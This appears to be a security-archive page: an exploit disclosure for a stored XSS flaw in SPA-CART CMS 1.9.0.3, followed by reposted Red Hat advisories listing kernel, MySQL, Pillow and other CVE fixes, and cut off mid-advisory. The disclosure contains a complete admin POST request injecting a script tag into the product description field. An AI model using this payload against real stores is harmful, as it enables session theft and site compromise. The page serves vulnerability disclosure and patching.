SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

Red Hat Security Advisory 2024-0897-03 - An update for kernel is now available for Red Hat Enterprise Linux 8. Issues addressed include null pointer, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0897.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:0897-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0897  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2022-3545  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)

* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)

* kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)

* kernel: HID: check empty report_list in hid_validate_values() (CVE-2023-1073)

* kernel: Possible use-after-free since the two fdget() during vhost_net_set_backend() (CVE-2023-1838)

* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)

* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)

* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)

* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)

* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)

* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)

* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)

* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)

* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)

* kernel: SEV-ES local priv escalation (CVE-2023-46813)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-3545

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2087568  
https://bugzilla.redhat.com/show_bug.cgi?id=2144379  
https://bugzilla.redhat.com/show_bug.cgi?id=2161310  
https://bugzilla.redhat.com/show_bug.cgi?id=2173403  
https://bugzilla.redhat.com/show_bug.cgi?id=2187813  
https://bugzilla.redhat.com/show_bug.cgi?id=2187931  
https://bugzilla.redhat.com/show_bug.cgi?id=2231800  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723  
https://bugzilla.redhat.com/show_bug.cgi?id=2245514  
https://bugzilla.redhat.com/show_bug.cgi?id=2246944  
https://bugzilla.redhat.com/show_bug.cgi?id=2246945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253611  
https://bugzilla.redhat.com/show_bug.cgi?id=2253614  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908  
https://bugzilla.redhat.com/show_bug.cgi?id=2254052  
https://bugzilla.redhat.com/show_bug.cgi?id=2254053  
https://bugzilla.redhat.com/show_bug.cgi?id=2254054  
https://bugzilla.redhat.com/show_bug.cgi?id=2255139

Red Hat Security Advisory 2024-0897-03

Red Hat Security Advisory 2024-0894-03 - An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0894.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: mysql:8.0 security updateAdvisory ID:        RHSA-2024:0894-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0894Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2022-4899====================================================================Summary: An update for the mysql:8.0 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.Security Fix(es):* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953, CVE-2023-21955)* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046, CVE-2023-22054, CVE-2023-22056)* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053)* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-20970, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)* mysql: Server : Security : Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22452)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-4899References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2179864https://bugzilla.redhat.com/show_bug.cgi?id=2188109https://bugzilla.redhat.com/show_bug.cgi?id=2188113https://bugzilla.redhat.com/show_bug.cgi?id=2188115https://bugzilla.redhat.com/show_bug.cgi?id=2188116https://bugzilla.redhat.com/show_bug.cgi?id=2188117https://bugzilla.redhat.com/show_bug.cgi?id=2188118https://bugzilla.redhat.com/show_bug.cgi?id=2188119https://bugzilla.redhat.com/show_bug.cgi?id=2188120https://bugzilla.redhat.com/show_bug.cgi?id=2188121https://bugzilla.redhat.com/show_bug.cgi?id=2188122https://bugzilla.redhat.com/show_bug.cgi?id=2188123https://bugzilla.redhat.com/show_bug.cgi?id=2188124https://bugzilla.redhat.com/show_bug.cgi?id=2188125https://bugzilla.redhat.com/show_bug.cgi?id=2188127https://bugzilla.redhat.com/show_bug.cgi?id=2188128https://bugzilla.redhat.com/show_bug.cgi?id=2188129https://bugzilla.redhat.com/show_bug.cgi?id=2188130https://bugzilla.redhat.com/show_bug.cgi?id=2188131https://bugzilla.redhat.com/show_bug.cgi?id=2188132https://bugzilla.redhat.com/show_bug.cgi?id=2224211https://bugzilla.redhat.com/show_bug.cgi?id=2224212https://bugzilla.redhat.com/show_bug.cgi?id=2224213https://bugzilla.redhat.com/show_bug.cgi?id=2224214https://bugzilla.redhat.com/show_bug.cgi?id=2224215https://bugzilla.redhat.com/show_bug.cgi?id=2224216https://bugzilla.redhat.com/show_bug.cgi?id=2224217https://bugzilla.redhat.com/show_bug.cgi?id=2224218https://bugzilla.redhat.com/show_bug.cgi?id=2224219https://bugzilla.redhat.com/show_bug.cgi?id=2224220https://bugzilla.redhat.com/show_bug.cgi?id=2224221https://bugzilla.redhat.com/show_bug.cgi?id=2224222https://bugzilla.redhat.com/show_bug.cgi?id=2245014https://bugzilla.redhat.com/show_bug.cgi?id=2245015https://bugzilla.redhat.com/show_bug.cgi?id=2245016https://bugzilla.redhat.com/show_bug.cgi?id=2245017https://bugzilla.redhat.com/show_bug.cgi?id=2245018https://bugzilla.redhat.com/show_bug.cgi?id=2245019https://bugzilla.redhat.com/show_bug.cgi?id=2245020https://bugzilla.redhat.com/show_bug.cgi?id=2245021https://bugzilla.redhat.com/show_bug.cgi?id=2245022https://bugzilla.redhat.com/show_bug.cgi?id=2245023https://bugzilla.redhat.com/show_bug.cgi?id=2245024https://bugzilla.redhat.com/show_bug.cgi?id=2245026https://bugzilla.redhat.com/show_bug.cgi?id=2245027https://bugzilla.redhat.com/show_bug.cgi?id=2245028https://bugzilla.redhat.com/show_bug.cgi?id=2245029https://bugzilla.redhat.com/show_bug.cgi?id=2245030https://bugzilla.redhat.com/show_bug.cgi?id=2245031https://bugzilla.redhat.com/show_bug.cgi?id=2245032https://bugzilla.redhat.com/show_bug.cgi?id=2245033https://bugzilla.redhat.com/show_bug.cgi?id=2245034https://bugzilla.redhat.com/show_bug.cgi?id=2258771https://bugzilla.redhat.com/show_bug.cgi?id=2258772https://bugzilla.redhat.com/show_bug.cgi?id=2258773https://bugzilla.redhat.com/show_bug.cgi?id=2258774https://bugzilla.redhat.com/show_bug.cgi?id=2258775https://bugzilla.redhat.com/show_bug.cgi?id=2258776https://bugzilla.redhat.com/show_bug.cgi?id=2258777https://bugzilla.redhat.com/show_bug.cgi?id=2258778https://bugzilla.redhat.com/show_bug.cgi?id=2258779https://bugzilla.redhat.com/show_bug.cgi?id=2258780https://bugzilla.redhat.com/show_bug.cgi?id=2258781https://bugzilla.redhat.com/show_bug.cgi?id=2258782https://bugzilla.redhat.com/show_bug.cgi?id=2258783https://bugzilla.redhat.com/show_bug.cgi?id=2258784https://bugzilla.redhat.com/show_bug.cgi?id=2258785https://bugzilla.redhat.com/show_bug.cgi?id=2258787https://bugzilla.redhat.com/show_bug.cgi?id=2258788https://bugzilla.redhat.com/show_bug.cgi?id=2258789https://bugzilla.redhat.com/show_bug.cgi?id=2258790https://bugzilla.redhat.com/show_bug.cgi?id=2258791https://bugzilla.redhat.com/show_bug.cgi?id=2258792https://bugzilla.redhat.com/show_bug.cgi?id=2258793https://bugzilla.redhat.com/show_bug.cgi?id=2258794

Red Hat Security Advisory 2024-0894-03

Red Hat Security Advisory 2024-0893-03 - An update for python-pillow is now available for Red Hat Enterprise Linux 8. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0893.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-pillow security updateAdvisory ID:        RHSA-2024:0893-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0893Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-50447====================================================================Summary: An update for python-pillow is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* pillow: Arbitrary Code Execution via the environment parameter (CVE-2023-50447)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-50447References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2259479

Red Hat Security Advisory 2024-0893-03

Red Hat Security Advisory 2024-0889-03 - An update for oniguruma is now available for Red Hat Enterprise Linux 8. Issues addressed include buffer over-read, integer overflow, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0889.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: oniguruma security update  
Advisory ID:        RHSA-2024:0889-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0889  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2019-13224  
====================================================================

Summary: 

An update for oniguruma is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Oniguruma is a regular expressions library that supports a variety of character encodings. 

Security Fix(es):

* oniguruma: Use-after-free in onig_new_deluxe() in regext.c (CVE-2019-13224)

* oniguruma: Stack exhaustion in regcomp.c because of recursion in regparse.c (CVE-2019-16163)

* oniguruma: integer overflow in search_in_range function in regexec.c leads to out-of-bounds read (CVE-2019-19012)

* oniguruma: Heap-based buffer over-read in function gb18030_mbc_enc_len in file gb18030.c (CVE-2019-19203)

* oniguruma: Heap-based buffer over-read in function fetch_interval_quantifier in regparse.c (CVE-2019-19204)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2019-13224

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=1728970  
https://bugzilla.redhat.com/show_bug.cgi?id=1768997  
https://bugzilla.redhat.com/show_bug.cgi?id=1802051  
https://bugzilla.redhat.com/show_bug.cgi?id=1802061  
https://bugzilla.redhat.com/show_bug.cgi?id=1802068

Red Hat Security Advisory 2024-0889-03

Red Hat Security Advisory 2024-0888-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0888.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: edk2 security updateAdvisory ID:        RHSA-2024:0888-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0888Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-3446====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3446References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2224962

Red Hat Security Advisory 2024-0888-03

Red Hat Security Advisory 2024-0887-03 - An update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0887.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: go-toolset:rhel8 security updateAdvisory ID:        RHSA-2024:0887-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0887Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-39326====================================================================Summary: An update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* golang: cmd/go: Protocol Fallback when fetching modules (CVE-2023-45285)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39326References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2253323https://bugzilla.redhat.com/show_bug.cgi?id=2253330

Red Hat Security Advisory 2024-0887-03

Red Hat Security Advisory 2024-0881-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Issues addressed include null pointer, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0881.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security update  
Advisory ID:        RHSA-2024:0881-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0881  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2022-3545  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)

* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)

* kernel: null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)

* kernel: HID: check empty report_list in hid_validate_values() (CVE-2023-1073)

* kernel: Possible use-after-free since the two fdget() during vhost_net_set_backend() (CVE-2023-1838)

* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)

* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)

* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)

* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)

* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)

* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)

* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)

* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)

* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)

* kernel: SEV-ES local priv escalation (CVE-2023-46813)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-3545

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2087568  
https://bugzilla.redhat.com/show_bug.cgi?id=2144379  
https://bugzilla.redhat.com/show_bug.cgi?id=2161310  
https://bugzilla.redhat.com/show_bug.cgi?id=2173403  
https://bugzilla.redhat.com/show_bug.cgi?id=2187813  
https://bugzilla.redhat.com/show_bug.cgi?id=2187931  
https://bugzilla.redhat.com/show_bug.cgi?id=2231800  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723  
https://bugzilla.redhat.com/show_bug.cgi?id=2245514  
https://bugzilla.redhat.com/show_bug.cgi?id=2246944  
https://bugzilla.redhat.com/show_bug.cgi?id=2246945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253611  
https://bugzilla.redhat.com/show_bug.cgi?id=2253614  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908  
https://bugzilla.redhat.com/show_bug.cgi?id=2254052  
https://bugzilla.redhat.com/show_bug.cgi?id=2254053  
https://bugzilla.redhat.com/show_bug.cgi?id=2254054  
https://bugzilla.redhat.com/show_bug.cgi?id=2255139

Red Hat Security Advisory 2024-0881-03

Red Hat Security Advisory 2024-0880-03 - Red Hat OpenShift Serverless 1.31.1 is now available. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0880.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Release of OpenShift Serverless Client kn 1.31.1 security updateAdvisory ID:        RHSA-2024:0880-03Product:            Red Hat OpenShift ServerlessAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0880Issue date:         2024-02-20Revision:           03CVE Names:          CVE-2023-39326====================================================================Summary: Red Hat OpenShift Serverless 1.31.1 is now available.Red Hat Product Security has rated this update as having a security impact ofCritical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift Serverless Client kn 1.31.1 provides a CLI to interact withRed Hat OpenShift Serverless 1.31.1. The kn CLI is delivered as an RPM packagefor installation on RHEL platforms, and as binaries for non-Linux platforms.This release includes security, bug fixes, and enhancements.Security 